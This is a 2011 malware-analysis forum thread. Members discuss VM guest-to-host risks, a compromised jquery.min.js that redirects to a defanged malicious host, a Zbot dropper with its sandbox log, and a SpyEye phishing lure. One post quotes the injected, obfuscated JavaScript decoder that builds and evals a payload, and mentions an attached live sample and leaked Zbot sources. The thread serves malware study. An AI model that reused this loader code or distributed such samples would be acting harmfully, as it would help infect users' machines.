A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #4843  by rossetoecioccolato
 Tue Feb 01, 2011 6:39 pm
> Ive found when using certain types of wireless via host and vm, this can also be a bad thing. <

I suppose that is only something that you get if somebody really likes you. :-| Would be interested though if there is anything that you can share. Did you look for rooted firmware in the SRAM of the wireless adapter?
 #4845  by PX5
 Tue Feb 01, 2011 8:12 pm
Actually....I havent a clue but any tdss\tdl dns changer would do the trick I assume, the host was XP SP3 and I was using VBox but its been atleast a year ago when it happened, DNS Settings for both host and guest were tainted.

Thats about it, I did feel special for the moment, as in Short Bus Special but the moment passed quickly. ;)
 #4857  by rossetoecioccolato
 Wed Feb 02, 2011 11:51 pm
> DNS Settings for both host and guest were tainted.<

Sorry, I misread your previous post. You were referring to a wireless router and I was thinking of a certain wireless network adapter. Virtually any hardware that is shared between the guest and host can lead to migration from guest to host partition. Thanks for sharing your experience.
 #5088  by gjf
 Fri Feb 18, 2011 12:00 am
Some new story. Some Russian sites presents to the user some js in jquery.min.js.
This code redirects to host hxxp://bul0va.com/index.php?tp=f67f75493a6182fa with html which uses Java applet with unique "pid" parameter to perform decoding in the following part of embedded js:
Code: Select all
var vrq = null;var mgi = document.styleSheets[0].rules || document.styleSheets[0].cssRules;for(var dcwes = 0; dcwes < mgi.length; dcwes++) {var ztffs = mgi.item ? mgi.item(dcwes) : mgi[dcwes];roz=(ztffs.cssText) ? ztffs.cssText : ztffs.style.cssText;vrq = roz.match(/url\("?data\:[^,]*,([^")]+)"?\)/)[1];};var s = "";var g = function(){return this;}();dtvu = g["e"+vrq.substr(0,2)+"l"];clrn = document.getElementsByTagName("textarea")[9-9].value.split(",");hqon=dtvu(vrq.substr(2));for (var i = 0; i < clrn.length; i++) {bzmwy = 9501 - 1*clrn[i];s += hqon(bzmwy);}dtvu(s);
where "textarea" - some data in js.

After that depending on OS version nix-systems are forwarded to Google and Win systems receives a dropper in %temp% which starts after that

This file has low detect and packed with UPX:
Code: Select all
UPX 0.89.6 - 1.02 / 1.05 - 2.90 -> Markus & Laszlo [Overlay]
There is another prot under UPX:
Code: Select all
AHTeam EP Protector 0.3 (fake PCGuard 4.03-4.15) -> FEUERRADER [Overlay] *
but the version is fake - the prot is modified slightly

The file is typical Zbot, maybe new, maybe old but repacked:
Code: Select all
Executing: d:\mxmt-upx.exe
...
AdjustTokenPrivileges(SE_PRIVILEGE_ENABLED) [d:\mxmt-upx.exe]
CreateMutex(_AVIRA_21099) [d:\mxmt-upx.exe]
...
RegCreateKeyEx(HKLM\software\microsoft\windows nt\currentversion\winlogon,(null)) [d:\mxmt-upx.exe]
RegSetValueEx(HKLM\software\microsoft\windows nt\currentversion\winlogon\userinit, REG_SZ: C:\WINDOWS\System32\userinit.exe,C:\WINDOWS\system32\sdra64.exe,) [d:\mxmt-upx.exe]
DeleteFile(C:\WINDOWS\system32\sdra64.exe) [d:\mxmt-upx.exe]
Copy(D:\mxmt-UPX.exe->C:\WINDOWS\system32\sdra64.exe) [d:\mxmt-upx.exe]
Anubis logs, CWSandbox logs.

Original dropper is attached, the pasword is infected.
Attachments
(112.21 KiB) Downloaded 75 times
 #6293  by gjf
 Wed May 11, 2011 9:12 pm
Just because this sources has leaked from closed mailings to public I can give a link here too :)
Sources are as old as 2.0.8.9.
For everybody who is interested.
 #7786  by Flamef
 Sat Jul 30, 2011 12:31 pm
So,i was browsing a forum and suddenly a message arrived at my box>Subject " Amy Winehouse moments before death "
A file was attached,it was password protected,it's a new trick a guess,since i saw a warning"The file update socking video footage realleased of Amy Winehouse moments before death.zip is password protected and cannot be scanned for viruses.
Some pictures of the interesting infected file>
Image
Image



Virus total scan > http://www.virustotal.com/file-scan/rep ... 1312027915
4/43

McAfee 5.400.0.1158 2011.07.30 PWS-Spyeye.bx

I don't know if this is the right place to attach the sample,if you need the sample to analyze it etc,hit me a pm or post here.
  • 1
  • 2
  • 3
  • 4
  • 5
  • 29